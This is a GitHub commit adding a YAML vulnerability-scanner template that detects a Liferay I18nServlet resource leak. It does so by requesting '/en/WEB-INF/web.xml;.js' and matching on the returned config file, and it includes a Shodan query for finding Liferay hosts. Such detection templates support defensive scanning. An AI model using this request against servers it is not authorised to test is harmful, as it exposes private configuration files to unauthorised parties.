Create liferay-resource-leak.yaml

patch-1
Dhiyaneshwaran 2022-08-07 23:05:09 +05:30 committed by GitHub
parent fa01f55a73
commit 1d1b95fd89
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: liferay-resource-leak
info:
name: Liferay - Resource leakage through I18nServlet
author: DhiyaneshDk
severity: high
description: |
I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works).
remediation: Update Liferay to the latest version
reference:
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
metadata:
verified: true
shodan-query: title:"Liferay"
tags: liferay,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/en/WEB-INF/web.xml;.js"
matchers-condition: and
matchers:
- type: regex
regex:
- "<web-app id"
part: body
- type: word
words:
- "application/xml"
part: header
- type: status
status:
- 200